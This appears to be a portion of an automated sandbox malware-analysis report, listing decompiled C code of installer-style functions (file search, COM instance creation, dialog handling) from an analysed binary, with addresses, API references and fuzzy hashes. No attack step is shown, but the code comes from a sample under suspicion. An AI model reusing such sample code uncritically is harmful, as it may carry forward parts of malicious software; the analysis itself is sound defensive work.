                                                                                                                                                                                                                            0x004022d7
                                                                                                                                                                                                                            0x004022da
                                                                                                                                                                                                                            0x004022e0
                                                                                                                                                                                                                            0x004022e6
                                                                                                                                                                                                                            0x004022fb
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004022e6
                                                                                                                                                                                                                            0x004022f1
                                                                                                                                                                                                                            0x00402c2d
                                                                                                                                                                                                                            0x00402c39

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • CoCreateInstance.OLE32(004084E4,?,00000001,004084D4,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402229
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            • C:\Users\user\AppData\Local\Temp, xrefs: 00402269
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000007.00000002.531367159.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531329224.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531503317.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531563073.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531808710.0000000000422000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531838733.0000000000427000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531879279.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531979945.000000000046B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_400000_UNK_.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CreateInstance
                                                                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp
                                                                                                                                                                                                                            • API String ID: 542301482-501415292
                                                                                                                                                                                                                            • Opcode ID: 4e8b9e8d9efc1323b126c51a2f9450484e7b2217165b473e9f4f1a567a0bf10e
                                                                                                                                                                                                                            • Instruction ID: f110e38d5ccd8909b9e85e2ea6b1342c5fae2602ce40754bea02e3b472428d32
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4e8b9e8d9efc1323b126c51a2f9450484e7b2217165b473e9f4f1a567a0bf10e
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BC411771A00209EFCF40DFE4C989E9D7BB5BF49304B20456AF505EB2D1DB799981CB94
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 0040699E Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E0040699E(WCHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileW(_a4, 0x426798); // executed
				if(_t2 == 0xffffffff) {
					return 0;
				}
				FindClose(_t2);
				return 0x426798;
			}




                                                                                                                                                                                                                            0x004069a9
                                                                                                                                                                                                                            0x004069b2
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004069bf
                                                                                                                                                                                                                            0x004069b5
                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • FindFirstFileW.KERNELBASE(7620FAA0,00426798,00425F50,00406088,00425F50,00425F50,00000000,00425F50,00425F50,7620FAA0,?,7620F560,00405D94,?,7620FAA0,7620F560), ref: 004069A9
                                                                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 004069B5
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000007.00000002.531367159.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531329224.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531503317.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531563073.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531808710.0000000000422000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531838733.0000000000427000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531879279.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531979945.000000000046B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_400000_UNK_.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Find$CloseFileFirst
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2295610775-0
                                                                                                                                                                                                                            • Opcode ID: 1093b80bdde5f117a2aeaff90f04fc035896fcf98737a4a628a8a679d5dfa397
                                                                                                                                                                                                                            • Instruction ID: 0ca7534fdffec89160a31ceabb6ef5ff718bfc83d1618d69d17f9e635378cbc3
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1093b80bdde5f117a2aeaff90f04fc035896fcf98737a4a628a8a679d5dfa397
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5ED012B15192205FC34057387E0C84B7A989F563317268A36B4AAF11E0CB348C3297AC
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 0040290B Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 41%
                                                                                                                                                                                                                            			E0040290B(short __ebx, short* __edi) {
				void* _t8;
				void* _t21;

				_t8 = FindFirstFileW(E00402DA6(2), _t21 - 0x2dc); // executed
				if(_t8 != 0xffffffff) {
					E004065AF( *((intOrPtr*)(_t21 - 0xc)), _t8);
					_push(_t21 - 0x2b0);
					_push(__edi);
					E00406668();
				} else {
					 *((short*)( *((intOrPtr*)(_t21 - 0xc)))) = __ebx;
					 *__edi = __ebx;
					 *((intOrPtr*)(_t21 - 4)) = 1;
				}
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t21 - 4));
				return 0;
			}





                                                                                                                                                                                                                            0x0040291a
                                                                                                                                                                                                                            0x00402923
                                                                                                                                                                                                                            0x0040293e
                                                                                                                                                                                                                            0x00402949
                                                                                                                                                                                                                            0x0040294a
                                                                                                                                                                                                                            0x00402a94
                                                                                                                                                                                                                            0x00402925
                                                                                                                                                                                                                            0x00402928
                                                                                                                                                                                                                            0x0040292b
                                                                                                                                                                                                                            0x0040292e
                                                                                                                                                                                                                            0x0040292e
                                                                                                                                                                                                                            0x00402c2d
                                                                                                                                                                                                                            0x00402c39

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • FindFirstFileW.KERNELBASE(00000000,?,00000002), ref: 0040291A
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000007.00000002.531367159.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531329224.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531503317.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531563073.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531808710.0000000000422000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531838733.0000000000427000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531879279.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531979945.000000000046B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_400000_UNK_.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: FileFindFirst
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1974802433-0
                                                                                                                                                                                                                            • Opcode ID: 81649c9ef60b362743358cc04841f69d280dec374dabcafdd230337d8cd45dd0
                                                                                                                                                                                                                            • Instruction ID: b84bdfeecc4e8c0803ac0e71b8711fc90ef1d688bdc4be786e729a17b55638d3
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 81649c9ef60b362743358cc04841f69d280dec374dabcafdd230337d8cd45dd0
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 47F05E71A04105EBDB01DBB4EE49AAEB378EF14314F60457BE101F21D0E7B88E529B29
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 004040C5 Relevance: 61.6, APIs: 34, Strings: 1, Instructions: 357windowstringCOMMON
                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                            control_flow_graph 194 4040c5-4040d7 195 4040dd-4040e3 194->195 196 40423e-40424d 194->196 195->196 199 4040e9-4040f2 195->199 197 40429c-4042b1 196->197 198 40424f-40428a GetDlgItem * 2 call 4045c4 KiUserCallbackDispatcher call 40140b 196->198 201 4042f1-4042f6 call 404610 197->201 202 4042b3-4042b6 197->202 220 40428f-404297 198->220 203 4040f4-404101 SetWindowPos 199->203 204 404107-40410e 199->204 218 4042fb-404316 201->218 206 4042b8-4042c3 call 401389 202->206 207 4042e9-4042eb 202->207 203->204 209 404110-40412a ShowWindow 204->209 210 404152-404158 204->210 206->207 234 4042c5-4042e4 SendMessageW 206->234 207->201 217 404591 207->217 211 404130-404143 GetWindowLongW 209->211 212 40422b-404239 call 40462b 209->212 214 404171-404174 210->214 215 40415a-40416c DestroyWindow 210->215 211->212 219 404149-40414c ShowWindow 211->219 222 404593-40459a 212->222 223 404176-404182 SetWindowLongW 214->223 224 404187-40418d 214->224 221 40456e-404574 215->221 217->222 227 404318-40431a call 40140b 218->227 228 40431f-404325 218->228 219->210 220->197 221->217 230 404576-40457c 221->230 223->222 224->212 233 404193-4041a2 GetDlgItem 224->233 227->228 231 40432b-404336 228->231 232 40454f-404568 DestroyWindow EndDialog 228->232 230->217 236 40457e-404587 ShowWindow 230->236 231->232 237 40433c-404389 call 4066a5 call 4045c4 * 3 GetDlgItem 231->237 232->221 238 4041c1-4041c4 233->238 239 4041a4-4041bb SendMessageW IsWindowEnabled 233->239 234->222 236->217 266 404393-4043cf ShowWindow KiUserCallbackDispatcher call 4045e6 EnableWindow 237->266 267 40438b-404390 237->267 241 4041c6-4041c7 238->241 242 4041c9-4041cc 238->242 239->217 239->238 244 4041f7-4041fc call 40459d 241->244 245 4041da-4041df 242->245 246 4041ce-4041d4 242->246 244->212 249 404215-404225 SendMessageW 245->249 251 4041e1-4041e7 245->251 246->249 250 4041d6-4041d8 246->250 249->212 250->244 252 4041e9-4041ef call 40140b 251->252 253 4041fe-404207 call 40140b 251->253 262 4041f5 252->262 253->212 263 404209-404213 253->263 262->244 263->262 270 4043d1-4043d2 266->270 271 4043d4 266->271 267->266 272 4043d6-404404 GetSystemMenu EnableMenuItem SendMessageW 270->272 271->272 273 404406-404417 SendMessageW 272->273 274 404419 272->274 275 40441f-40445e call 4045f9 call 4040a6 call 406668 lstrlenW call 4066a5 SetWindowTextW call 401389 273->275 274->275 275->218 286 404464-404466 275->286 286->218 287 40446c-404470 286->287 288 404472-404478 287->288 289 40448f-4044a3 DestroyWindow 287->289 288->217 290 40447e-404484 288->290 289->221 291 4044a9-4044d6 CreateDialogParamW 289->291 290->218 292 40448a 290->292 291->221 293 4044dc-404533 call 4045c4 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 291->293 292->217 293->217 298 404535-404548 ShowWindow call 404610 293->298 300 40454d 298->300 300->221
                                                                                                                                                                                                                            C-Code - Quality: 86%
                                                                                                                                                                                                                            			E004040C5(struct HWND__* _a4, intOrPtr _a8, int _a12, long _a16) {
				struct HWND__* _v28;
				void* _v80;
				void* _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t34;
				signed int _t36;
				signed int _t38;
				struct HWND__* _t48;
				signed int _t67;
				struct HWND__* _t73;
				signed int _t86;
				struct HWND__* _t91;
				signed int _t99;
				int _t103;
				signed int _t117;
				int _t118;
				int _t122;
				signed int _t124;
				struct HWND__* _t127;
				struct HWND__* _t128;
				int _t129;
				intOrPtr _t130;
				long _t133;
				int _t135;
				int _t136;
				void* _t137;

				_t130 = _a8;
				if(_t130 == 0x110 || _t130 == 0x408) {
					_t34 = _a12;
					_t127 = _a4;
					__eflags = _t130 - 0x110;
					 *0x423730 = _t34;
					if(_t130 == 0x110) {
						 *0x42a268 = _t127;
						 *0x423744 = GetDlgItem(_t127, 1);
						_t91 = GetDlgItem(_t127, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x421710 = _t91;
						E004045C4(_t127);
						SetClassLongW(_t127, 0xfffffff2,  *0x429248); // executed
						 *0x42922c = E0040140B(4);
						_t34 = 1;
						__eflags = 1;
						 *0x423730 = 1;
					}
					_t124 =  *0x40a39c; // 0x0
					_t136 = 0;
					_t133 = (_t124 << 6) +  *0x42a280;
					__eflags = _t124;
					if(_t124 < 0) {
						L36:
						E00404610(0x40b);
						while(1) {
							_t36 =  *0x423730;
							 *0x40a39c =  *0x40a39c + _t36;
							_t133 = _t133 + (_t36 << 6);
							_t38 =  *0x40a39c; // 0x0
							__eflags = _t38 -  *0x42a284;
							if(_t38 ==  *0x42a284) {
								E0040140B(1);
							}
							__eflags =  *0x42922c - _t136;
							if( *0x42922c != _t136) {
								break;
							}
							__eflags =  *0x40a39c -  *0x42a284; // 0x0
							if(__eflags >= 0) {
								break;
							}
							_t117 =  *(_t133 + 0x14);
							E004066A5(_t117, _t127, _t133, 0x43a000,  *((intOrPtr*)(_t133 + 0x24)));
							_push( *((intOrPtr*)(_t133 + 0x20)));
							_push(0xfffffc19);
							E004045C4(_t127);
							_push( *((intOrPtr*)(_t133 + 0x1c)));
							_push(0xfffffc1b);
							E004045C4(_t127);
							_push( *((intOrPtr*)(_t133 + 0x28)));
							_push(0xfffffc1a);
							E004045C4(_t127);
							_t48 = GetDlgItem(_t127, 3);
							__eflags =  *0x42a2ec - _t136;
							_v28 = _t48;
							if( *0x42a2ec != _t136) {
								_t117 = _t117 & 0x0000fefd | 0x00000004;
								__eflags = _t117;
							}
							ShowWindow(_t48, _t117 & 0x00000008); // executed
							EnableWindow( *(_t137 + 0x34), _t117 & 0x00000100); // executed
							E004045E6(_t117 & 0x00000002);
							_t118 = _t117 & 0x00000004;
							EnableWindow( *0x421710, _t118);
							__eflags = _t118 - _t136;
							if(_t118 == _t136) {
								_push(1);
							} else {
								_push(_t136);
							}
							EnableMenuItem(GetSystemMenu(_t127, _t136), 0xf060, ??);
							SendMessageW( *(_t137 + 0x3c), 0xf4, _t136, 1);
							__eflags =  *0x42a2ec - _t136;
							if( *0x42a2ec == _t136) {
								_push( *0x423744);
							} else {
								SendMessageW(_t127, 0x401, 2, _t136);
								_push( *0x421710);
							}
							E004045F9();
							E00406668(0x423748, E004040A6());
							E004066A5(0x423748, _t127, _t133,  &(0x423748[lstrlenW(0x423748)]),  *((intOrPtr*)(_t133 + 0x18)));
							SetWindowTextW(_t127, 0x423748); // executed
							_t67 = E00401389( *((intOrPtr*)(_t133 + 8)), _t136);
							__eflags = _t67;
							if(_t67 != 0) {
								continue;
							} else {
								__eflags =  *_t133 - _t136;
								if( *_t133 == _t136) {
									continue;
								}
								__eflags =  *(_t133 + 4) - 5;
								if( *(_t133 + 4) != 5) {
									DestroyWindow( *0x429238); // executed
									 *0x422720 = _t133;
									__eflags =  *_t133 - _t136;
									if( *_t133 <= _t136) {
										goto L60;
									}
									_t73 = CreateDialogParamW( *0x42a260,  *_t133 +  *0x429240 & 0x0000ffff, _t127,  *(0x40a3a0 +  *(_t133 + 4) * 4), _t133); // executed
									__eflags = _t73 - _t136;
									 *0x429238 = _t73;
									if(_t73 == _t136) {
										goto L60;
									}
									_push( *((intOrPtr*)(_t133 + 0x2c)));
									_push(6);
									E004045C4(_t73);
									GetWindowRect(GetDlgItem(_t127, 0x3fa), _t137 + 0x10);
									ScreenToClient(_t127, _t137 + 0x10);
									SetWindowPos( *0x429238, _t136,  *(_t137 + 0x20),  *(_t137 + 0x20), _t136, _t136, 0x15);
									E00401389( *((intOrPtr*)(_t133 + 0xc)), _t136);
									__eflags =  *0x42922c - _t136;
									if( *0x42922c != _t136) {
										goto L63;
									}
									ShowWindow( *0x429238, 8); // executed
									E00404610(0x405);
									goto L60;
								}
								__eflags =  *0x42a2ec - _t136;
								if( *0x42a2ec != _t136) {
									goto L63;
								}
								__eflags =  *0x42a2e0 - _t136;
								if( *0x42a2e0 != _t136) {
									continue;
								}
								goto L63;
							}
						}
						DestroyWindow( *0x429238);
						 *0x42a268 = _t136;
						EndDialog(_t127,  *0x421f18);
						goto L60;
					} else {
						__eflags = _t34 - 1;
						if(_t34 != 1) {
							L35:
							__eflags =  *_t133 - _t136;
							if( *_t133 == _t136) {
								goto L63;
							}
							goto L36;
						}
						_t86 = E00401389( *((intOrPtr*)(_t133 + 0x10)), 0);
						__eflags = _t86;
						if(_t86 == 0) {
							goto L35;
						}
						SendMessageW( *0x429238, 0x40f, 0, 1);
						__eflags =  *0x42922c;
						return 0 |  *0x42922c == 0x00000000;
					}
				} else {
					_t127 = _a4;
					_t136 = 0;
					if(_t130 == 0x47) {
						SetWindowPos( *0x423728, _t127, 0, 0, 0, 0, 0x13);
					}
					_t122 = _a12;
					if(_t130 != 5) {
						L8:
						if(_t130 != 0x40d) {
							__eflags = _t130 - 0x11;
							if(_t130 != 0x11) {
								__eflags = _t130 - 0x111;
								if(_t130 != 0x111) {
									goto L28;
								}
								_t135 = _t122 & 0x0000ffff;
								_t128 = GetDlgItem(_t127, _t135);
								__eflags = _t128 - _t136;
								if(_t128 == _t136) {
									L15:
									__eflags = _t135 - 1;
									if(_t135 != 1) {
										__eflags = _t135 - 3;
										if(_t135 != 3) {
											_t129 = 2;
											__eflags = _t135 - _t129;
											if(_t135 != _t129) {
												L27:
												SendMessageW( *0x429238, 0x111, _t122, _a16);
												goto L28;
											}
											__eflags =  *0x42a2ec - _t136;
											if( *0x42a2ec == _t136) {
												_t99 = E0040140B(3);
												__eflags = _t99;
												if(_t99 != 0) {
													goto L28;
												}
												 *0x421f18 = 1;
												L23:
												_push(0x78);
												L24:
												E0040459D();
												goto L28;
											}
											E0040140B(_t129);
											 *0x421f18 = _t129;
											goto L23;
										}
										__eflags =  *0x40a39c - _t136; // 0x0
										if(__eflags <= 0) {
											goto L27;
										}
										_push(0xffffffff);
										goto L24;
									}
									_push(_t135);
									goto L24;
								}
								SendMessageW(_t128, 0xf3, _t136, _t136);
								_t103 = IsWindowEnabled(_t128);
								__eflags = _t103;
								if(_t103 == 0) {
									L63:
									return 0;
								}
								goto L15;
							}
							SetWindowLongW(_t127, _t136, _t136);
							return 1;
						}
						DestroyWindow( *0x429238);
						 *0x429238 = _t122;
						L60:
						if( *0x425748 == _t136 &&  *0x429238 != _t136) {
							ShowWindow(_t127, 0xa); // executed
							 *0x425748 = 1;
						}
						goto L63;
					} else {
						asm("sbb eax, eax");
						ShowWindow( *0x423728,  ~(_t122 - 1) & 0x00000005);
						if(_t122 != 2 || (GetWindowLongW(_t127, 0xfffffff0) & 0x21010000) != 0x1000000) {
							L28:
							return E0040462B(_a8, _t122, _a16);
						} else {
							ShowWindow(_t127, 4);
							goto L8;
						}
					}
				}
			}































                                                                                                                                                                                                                            0x004040d0
                                                                                                                                                                                                                            0x004040d7
                                                                                                                                                                                                                            0x0040423e
                                                                                                                                                                                                                            0x00404242
                                                                                                                                                                                                                            0x00404246
                                                                                                                                                                                                                            0x00404248
                                                                                                                                                                                                                            0x0040424d
                                                                                                                                                                                                                            0x00404258
                                                                                                                                                                                                                            0x00404263
                                                                                                                                                                                                                            0x00404268
                                                                                                                                                                                                                            0x0040426a
                                                                                                                                                                                                                            0x0040426c
                                                                                                                                                                                                                            0x0040426f
                                                                                                                                                                                                                            0x00404274
                                                                                                                                                                                                                            0x00404282
                                                                                                                                                                                                                            0x0040428f
                                                                                                                                                                                                                            0x00404296
                                                                                                                                                                                                                            0x00404296
                                                                                                                                                                                                                            0x00404297
                                                                                                                                                                                                                            0x00404297
                                                                                                                                                                                                                            0x0040429c
                                                                                                                                                                                                                            0x004042a2
                                                                                                                                                                                                                            0x004042a9
                                                                                                                                                                                                                            0x004042af
                                                                                                                                                                                                                            0x004042b1
                                                                                                                                                                                                                            0x004042f1
                                                                                                                                                                                                                            0x004042f6
                                                                                                                                                                                                                            0x004042fb
                                                                                                                                                                                                                            0x004042fb
                                                                                                                                                                                                                            0x00404300
                                                                                                                                                                                                                            0x00404309
                                                                                                                                                                                                                            0x0040430b
                                                                                                                                                                                                                            0x00404310
                                                                                                                                                                                                                            0x00404316
                                                                                                                                                                                                                            0x0040431a
                                                                                                                                                                                                                            0x0040431a
                                                                                                                                                                                                                            0x0040431f
                                                                                                                                                                                                                            0x00404325
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00404330
                                                                                                                                                                                                                            0x00404336
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0040433f
                                                                                                                                                                                                                            0x00404347
                                                                                                                                                                                                                            0x0040434c
                                                                                                                                                                                                                            0x0040434f
                                                                                                                                                                                                                            0x00404355
                                                                                                                                                                                                                            0x0040435a
                                                                                                                                                                                                                            0x0040435d
                                                                                                                                                                                                                            0x00404363
                                                                                                                                                                                                                            0x00404368
                                                                                                                                                                                                                            0x0040436b
                                                                                                                                                                                                                            0x00404371
                                                                                                                                                                                                                            0x00404379
                                                                                                                                                                                                                            0x0040437f
                                                                                                                                                                                                                            0x00404385
                                                                                                                                                                                                                            0x00404389
                                                                                                                                                                                                                            0x00404390
                                                                                                                                                                                                                            0x00404390
                                                                                                                                                                                                                            0x00404390
                                                                                                                                                                                                                            0x0040439a
                                                                                                                                                                                                                            0x004043ac
                                                                                                                                                                                                                            0x004043b8
                                                                                                                                                                                                                            0x004043bd
                                                                                                                                                                                                                            0x004043c7
                                                                                                                                                                                                                            0x004043cd
                                                                                                                                                                                                                            0x004043cf
                                                                                                                                                                                                                            0x004043d4
                                                                                                                                                                                                                            0x004043d1
                                                                                                                                                                                                                            0x004043d1
                                                                                                                                                                                                                            0x004043d1
                                                                                                                                                                                                                            0x004043e4
                                                                                                                                                                                                                            0x004043fc
                                                                                                                                                                                                                            0x004043fe
                                                                                                                                                                                                                            0x00404404
                                                                                                                                                                                                                            0x00404419
                                                                                                                                                                                                                            0x00404406
                                                                                                                                                                                                                            0x0040440f
                                                                                                                                                                                                                            0x00404411
                                                                                                                                                                                                                            0x00404411
                                                                                                                                                                                                                            0x0040441f
                                                                                                                                                                                                                            0x00404430
                                                                                                                                                                                                                            0x00404446
                                                                                                                                                                                                                            0x0040444d
                                                                                                                                                                                                                            0x00404457
                                                                                                                                                                                                                            0x0040445c
                                                                                                                                                                                                                            0x0040445e
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00404464
                                                                                                                                                                                                                            0x00404464
                                                                                                                                                                                                                            0x00404466
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0040446c
                                                                                                                                                                                                                            0x00404470
                                                                                                                                                                                                                            0x00404495
                                                                                                                                                                                                                            0x0040449b
                                                                                                                                                                                                                            0x004044a1
                                                                                                                                                                                                                            0x004044a3
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004044c9
                                                                                                                                                                                                                            0x004044cf
                                                                                                                                                                                                                            0x004044d1
                                                                                                                                                                                                                            0x004044d6
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004044dc
                                                                                                                                                                                                                            0x004044df
                                                                                                                                                                                                                            0x004044e2
                                                                                                                                                                                                                            0x004044f9
                                                                                                                                                                                                                            0x00404505
                                                                                                                                                                                                                            0x0040451e
                                                                                                                                                                                                                            0x00404528
                                                                                                                                                                                                                            0x0040452d
                                                                                                                                                                                                                            0x00404533
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0040453d
                                                                                                                                                                                                                            0x00404548
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00404548
                                                                                                                                                                                                                            0x00404472
                                                                                                                                                                                                                            0x00404478
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0040447e
                                                                                                                                                                                                                            0x00404484
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0040448a
                                                                                                                                                                                                                            0x0040445e
                                                                                                                                                                                                                            0x00404555
                                                                                                                                                                                                                            0x00404561
                                                                                                                                                                                                                            0x00404568
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004042b3
                                                                                                                                                                                                                            0x004042b3
                                                                                                                                                                                                                            0x004042b6
                                                                                                                                                                                                                            0x004042e9
                                                                                                                                                                                                                            0x004042e9
                                                                                                                                                                                                                            0x004042eb
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004042eb
                                                                                                                                                                                                                            0x004042bc
                                                                                                                                                                                                                            0x004042c1
                                                                                                                                                                                                                            0x004042c3
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004042d3
                                                                                                                                                                                                                            0x004042db
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004042e1
                                                                                                                                                                                                                            0x004040e9
                                                                                                                                                                                                                            0x004040e9
                                                                                                                                                                                                                            0x004040ed
                                                                                                                                                                                                                            0x004040f2
                                                                                                                                                                                                                            0x00404101
                                                                                                                                                                                                                            0x00404101
                                                                                                                                                                                                                            0x00404107
                                                                                                                                                                                                                            0x0040410e
                                                                                                                                                                                                                            0x00404152
                                                                                                                                                                                                                            0x00404158
                                                                                                                                                                                                                            0x00404171
                                                                                                                                                                                                                            0x00404174
                                                                                                                                                                                                                            0x00404187
                                                                                                                                                                                                                            0x0040418d
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00404193
                                                                                                                                                                                                                            0x0040419e
                                                                                                                                                                                                                            0x004041a0
                                                                                                                                                                                                                            0x004041a2
                                                                                                                                                                                                                            0x004041c1
                                                                                                                                                                                                                            0x004041c1
                                                                                                                                                                                                                            0x004041c4
                                                                                                                                                                                                                            0x004041c9
                                                                                                                                                                                                                            0x004041cc
                                                                                                                                                                                                                            0x004041dc
                                                                                                                                                                                                                            0x004041dd
                                                                                                                                                                                                                            0x004041df
                                                                                                                                                                                                                            0x00404215
                                                                                                                                                                                                                            0x00404225
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00404225
                                                                                                                                                                                                                            0x004041e1
                                                                                                                                                                                                                            0x004041e7
                                                                                                                                                                                                                            0x00404200
                                                                                                                                                                                                                            0x00404205
                                                                                                                                                                                                                            0x00404207
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00404209
                                                                                                                                                                                                                            0x004041f5
                                                                                                                                                                                                                            0x004041f5
                                                                                                                                                                                                                            0x004041f7
                                                                                                                                                                                                                            0x004041f7
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004041f7
                                                                                                                                                                                                                            0x004041ea
                                                                                                                                                                                                                            0x004041ef
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004041ef
                                                                                                                                                                                                                            0x004041ce
                                                                                                                                                                                                                            0x004041d4
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004041d6
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004041d6
                                                                                                                                                                                                                            0x004041c6
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004041c6
                                                                                                                                                                                                                            0x004041ac
                                                                                                                                                                                                                            0x004041b3
                                                                                                                                                                                                                            0x004041b9
                                                                                                                                                                                                                            0x004041bb
                                                                                                                                                                                                                            0x00404591
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00404591
